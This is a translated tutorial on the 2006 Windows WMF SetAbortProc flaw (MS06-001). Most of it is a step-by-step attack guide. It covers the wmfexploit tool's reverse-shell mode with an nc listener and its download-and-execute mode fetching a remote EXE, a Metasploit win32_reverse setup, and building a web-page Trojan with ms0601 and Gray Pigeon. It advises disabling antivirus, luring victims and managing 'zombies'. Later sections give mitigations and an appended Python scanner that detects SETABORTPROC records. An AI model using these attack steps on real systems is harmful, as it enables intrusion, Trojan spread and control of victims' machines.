Image-Induced Overflow Crisis (Illustrated) _ Vulnerability Research

Source: Internet
Author: User
At the very start of 2006 a serious flaw surfaced in Windows: the Microsoft Windows Graphics Rendering Engine WMF code execution vulnerability (Microsoft bulletin MS06-001, CVE-2005-4560). The flaw sits in the GDI graphics rendering engine (gdi32.dll). An attacker crafts a malicious WMF file and lures a user into opening it; on a system without the WMF patch the code embedded in the file runs with the privileges of the logged-on user, which on most Windows installations of the time meant an administrator account, so the machine ends up completely at the attacker's disposal. Strictly speaking the bug is not a buffer overflow: the WMF format contains an Escape record, and the SetAbortProc escape lets a metafile register a callback that GDI then calls, so a file can point GDI straight at attacker-supplied code. This article keeps the word "overflow" because that is what the tools of the time called it. Within days of the disclosure, malware spreading through the WMF vulnerability appeared on the network, attacks continued, and countless exploit tools for the WMF vulnerability followed. This article explains how the WMF vulnerability is exploited and how to defend against it.

Because the WMF vulnerability affects a wide range of Windows versions, everything from Windows 98 through Windows Server 2003 (Microsoft shipped patches only for Windows 2000, XP and Server 2003), its impact is significant. Attacks exploiting the WMF vulnerability currently take two main forms: 1. overflow attacks, which hand the attacker a shell on the victim's machine with the victim's privileges; 2. web-page Trojans built on the vulnerability, which turn the victim's computer into a zombie ("broiler" in Chinese hacker slang) controlled by the attacker. Let's look at how an attacker exploits the WMF vulnerability.

I. Using a dedicated overflow tool

An overflow tool for the WMF vulnerability appeared on the web only a few days after the vulnerability was disclosed; although it was an early and rough release, it still compromised vulnerable hosts easily. The tool is called wmfexploit. Download it to the C: drive (antivirus software flags the exploit program as a virus, so it has to be disabled for the test), click Start → Run, enter CMD to open a command prompt, change to the C: drive and run wmfexploit with no arguments to see its usage instructions. It offers two overflow modes: 1. reverse connection; 2. download-and-execute.

1. Reverse overflow, passing through the firewall

The biggest advantage of the reverse mode is that it passes through the victim's firewall: outbound connections are usually allowed even where inbound ones are blocked. At the same time, because the WMF vulnerability is client-side, a vulnerability scanner cannot tell us which hosts are vulnerable, so we use a reverse connection and let the vulnerable host connect back to our machine on its own.

Running wmfexploit in the command prompt prints the usage for the reverse mode (the placeholders were lost from this copy of the page; the example below shows what they stand for): wmfexploit 1 <web IP> <web port> <listen IP> <listen port>. The number 1 selects the reverse-connection mode. The first IP and port are this computer's; the tool opens a small web service there so the target can fetch the malicious WMF file from us and trigger the overflow. The last IP and port are where we listen for the shell that the overflow sends back. For example: "wmfexploit 1 192.168.0.1 777 192.168.0.1 888". After the settings are entered, the program reports that the binding succeeded.

Figure 1. Setting up a reverse connection successfully

Once the setup is complete, open another command prompt and run the well-known network tool nc with "nc -vv -l -p 888" so that nc listens on port 888 on this computer. Then we lure the target into visiting our malicious WMF file by sending the URL "http://192.168.0.1:777/any.wmf". When the target opens this address it renders the WMF file that carries our exploit data. Back in the nc listening window we can see that the target host has been overflowed successfully.


Figure 2. Get a shell after overflow

Tip: the IP address 192.168.0.1 used above is a private (intranet) address chosen for convenience in the test. To test a host on the Internet, replace it with the public IP address that the target can actually reach.

2. Download-and-execute, running a Trojan directly

Besides the reverse mode, wmfexploit also has a download-and-execute mode. When the target host is overflowed by the malicious WMF file, no shell is sent back to a listening port; instead the exploit downloads an EXE file from a specified URL and runs it. That file can be a Trojan or any other program. Of course, we also need some web space on which to host the EXE file to be executed.

The usage of the download-and-execute mode is: wmfexploit 2 <web IP> <web port> <EXE URL>. The number 2 switches to download-and-execute mode, and the last argument is the URL of the EXE file. For example: "wmfexploit 2 192.168.0.1 777 http://www.***.com/123.exe". After the setup is complete there is no need to listen with nc; just send out the URL "http://192.168.0.1:777/any.wmf".

II. Using a graphical overflow testing framework

Metasploit is a well-known overflow testing framework that covers almost every current overflow vulnerability; it can be thought of as a collection of all the overflow programs. It is not a simple pile of exploits, though: it provides a convenient, targeted testing platform. Its biggest advantage for this purpose is its browser-based graphical interface, which makes overflow testing easy for beginners.

Download and install Metasploit. When the installation finishes, click Start and run "msfupdate" from the program group; a command prompt window opens and lists the files to be updated. Enter "yes" to update the exploit modules. After the update completes, run "msfweb" to start Metasploit's local web service, then open a browser and enter "http://127.0.0.1:55555" in the address bar to reach the Metasploit interface. In the exploit list select "Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution" to enter the vulnerability information page, click the target "0 - Automatic - Windows XP / Windows 2003 / Windows Vista (default)" at the bottom, and choose "win32_reverse" under "Select Payload:". Finally, on the options page only four items need to be set: "HTTPHOST", "HTTPPORT", "LHOST" and "LPORT"; everything else keeps its default. Their meaning and the way they are set are the same as for wmfexploit, so they are not repeated here.


Figure 3. Fill in the overflow information in the Metasploit

As before, send the address of the malicious WMF file to the target. Once the target has been overflowed, click "SESSIONS" in the Metasploit interface to get a shell running with the victim's privileges, which in these tests means administrator rights.

Tip: be sure to run the update before using Metasploit, or the WMF exploit module will most likely be missing from the list.

III. Building a web-page Trojan from the vulnerability

The biggest impact of the WMF vulnerability is the spread of web-page Trojans. Because antivirus software does not inspect image files very thoroughly, a web-page Trojan built on the WMF vulnerability succeeds easily and has become the leading web Trojan of late. Let's look at how a WMF web Trojan is produced.

First we need a Trojan program. A reverse-connecting Trojan such as Gray Pigeon (Huigezi) is recommended: when a target is overflowed, the Trojan connects back to our host on its own, so we do not need to connect out to each victim, which makes managing the zombies convenient. The configured Trojan server is then placed on web space (free hosting is enough).

Download the WMF Trojan generator ms0601. Run it in a command prompt after downloading; its usage is simple: ms0601 [URL of the EXE file], i.e. just pass the address of the Trojan file. After pressing Enter, a file named exploit.wmf is generated in the same directory. Opening this WMF file triggers the overflow and automatically downloads and runs the Trojan from the web.

Upload exploit.wmf to the web space. Finally, insert a short piece of code into the home page's source that loads exploit.wmf without opening a new browser window (the snippet itself is missing from this copy of the article). Anyone who visits the home page then renders exploit.wmf silently and is overflowed.

IV. Patching the hole and guarding against Trojans

Because the WMF vulnerability was disclosed only recently, many systems on the network are still unpatched. Both the overflow attacks and the web Trojans therefore succeed at a very high rate, which gives viruses and Trojans a new way to spread. Having seen how attackers exploit the WMF vulnerability, let's look at how to patch it and how to guard against Trojans that exploit it.

1. Unregistering the DLL

The overflow is typically triggered when a malicious WMF file is viewed with the Windows Picture and Fax Viewer, so if you are not ready to apply the system patch, you can first unregister the viewer's DLL, shimgvw.dll. Once it is unregistered, the Picture and Fax Viewer no longer starts, and this route to the overflow is closed. Note the caveat Microsoft gave for this workaround: the vulnerable code lives in GDI, not in the viewer, so any other application that renders metafiles (Explorer previews, Office documents, other image viewers) can still be exploited. Unregistering the DLL only blocks the most common attack path; the patch is the real fix.

To unregister it, click Start → Run and enter "regsvr32 -u %windir%\system32\shimgvw.dll". To restore the Windows Picture and Fax Viewer later, enter "regsvr32 %windir%\system32\shimgvw.dll" to register it again.


Figure 4. Unregistering shimgvw.dll

2. Applying the vendor patch

Microsoft has now released a patch for this vulnerability; it can be downloaded from http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx. The update changes how GDI handles the SETABORTPROC escape inside metafiles, and it is the most thorough and safest way to fix the problem.

If you are not ready to apply Microsoft's patch, an unofficial third-party patch was also circulated at the time.

3. Beware of unknown image files

When a malicious WMF file is hosted on web space, accessing it behaves differently on different systems. Windows 2000 mostly shows a download prompt for the WMF file. Windows XP and Windows 2003 open the Windows Picture and Fax Viewer, but no picture content is displayed. In that situation you should be careful: the WMF file may well carry exploit data. Note also that the trigger is not limited to files with a .wmf extension; GDI recognises a metafile by its content, so a file with a .jpg, .bmp or other image extension that is really a WMF can overflow just the same. So be extra careful with unknown pictures: attackers often give a malicious image file a tempting name to lure people into opening it.


Figure 5. Behaviour when opening a malicious WMF file

In addition, keeping antivirus software up to date is essential: the latest virus databases already classify the malicious WMF files as viruses.
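The two practical points of this section, that a WMF is recognised by its content rather than its extension and that an exploit file carries a SETABORTPROC escape record, can be turned into a small scanner. The Python below is an added example written for this edit, not a tool from the article, from Microsoft or from any antivirus vendor. The file layout follows the public MS-WMF specification (optional 22-byte placeable header, 18-byte header, records of a 4-byte size in words plus a 2-byte function code); the two sample files are constructed inside the code and contain only filler bytes, not shellcode.

```python
import struct

# Constants from the Windows Metafile format (MS-WMF).
PLACEABLE_KEY = 0x9AC6CDD7   # magic of the optional 22-byte placeable header
META_EOF = 0x0000
META_ESCAPE = 0x0626
META_SETPIXEL = 0x041F
SETABORTPROC = 0x0009        # the Escape sub-function abused by MS06-001


def looks_like_wmf(data: bytes) -> bool:
    """Identify a WMF by its header bytes, never by the file extension."""
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        return True
    if len(data) >= 18:
        ftype, header_words, version = struct.unpack_from("<HHH", data, 0)
        # Type 1 = memory metafile, 2 = disk metafile; the header is 9 words.
        return ftype in (1, 2) and header_words == 9 and version in (0x0100, 0x0300)
    return False


def iter_records(data: bytes):
    """Yield (offset, function, params) per record. params is None when the
    record size is impossibly small or runs past the end of the file."""
    offset = 22 if data[:4] == struct.pack("<I", PLACEABLE_KEY) else 0
    header_words = struct.unpack_from("<H", data, offset + 2)[0]
    offset += header_words * 2
    while offset + 6 <= len(data):
        size_words, function = struct.unpack_from("<IH", data, offset)
        size = size_words * 2
        if size < 6 or offset + size > len(data):
            yield offset, function, None
            return
        yield offset, function, data[offset + 6:offset + size]
        if function == META_EOF:
            return
        offset += size


def scan_wmf(data: bytes) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    if not looks_like_wmf(data):
        return ["no WMF header: not a metafile, whatever its extension says"]
    findings = []
    last_function = None
    for offset, function, params in iter_records(data):
        last_function = function
        if params is None:
            findings.append(f"malformed or truncated record at offset {offset}")
            return findings
        if function == META_ESCAPE and len(params) >= 4:
            escape, byte_count = struct.unpack_from("<HH", params, 0)
            if escape == SETABORTPROC:
                findings.append(
                    f"META_ESCAPE/SETABORTPROC at offset {offset} "
                    f"({byte_count} bytes of handler data): MS06-001 trigger")
    if last_function != META_EOF:
        findings.append("file ends without a META_EOF record")
    return findings


# --- Constructed sample files (not real captures) -------------------------
def _record(function: int, params: bytes = b"") -> bytes:
    return struct.pack("<IH", (6 + len(params)) // 2, function) + params


def build_wmf(records: list, placeable: bool = False) -> bytes:
    """Assemble a minimal disk metafile around the given records."""
    body = b"".join(records) + _record(META_EOF)
    max_record_words = max(len(r) for r in records + [_record(META_EOF)]) // 2
    header = struct.pack("<HHHIHIH", 2, 9, 0x0300,
                         (18 + len(body)) // 2, 0, max_record_words, 0)
    placeable_header = struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0,
                                   0, 0, 100, 100, 96, 0, 0)
    return (placeable_header if placeable else b"") + header + body


# A benign file: one SETPIXEL record and nothing else.
BENIGN = build_wmf([_record(META_SETPIXEL, struct.pack("<IHH", 0x0000FF, 5, 5))])

# A file that registers an abort procedure. The "handler" bytes are filler
# ("A" * 8), not shellcode, so this sample is harmless.
MALICIOUS = build_wmf([_record(META_ESCAPE,
                               struct.pack("<HH", SETABORTPROC, 8) + b"A" * 8)],
                      placeable=True)

if __name__ == "__main__":
    for name, blob in (("benign.wmf", BENIGN), ("exploit.wmf", MALICIOUS),
                       ("truncated.wmf", MALICIOUS[:-4]), ("renamed.jpg", MALICIOUS)):
        print(name, scan_wmf(blob) or "clean")
```

The scanner deliberately ignores the file name: `scan_wmf` is fed raw bytes, so a WMF renamed to .jpg is treated exactly like a .wmf, which is the behaviour GDI itself has. A SETABORTPROC escape has no purpose in a picture that is only going to be displayed, so flagging it produces essentially no false positives; the extra check for a missing META_EOF or an impossible record size catches the sloppy files that exploit generators of the time tended to emit.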
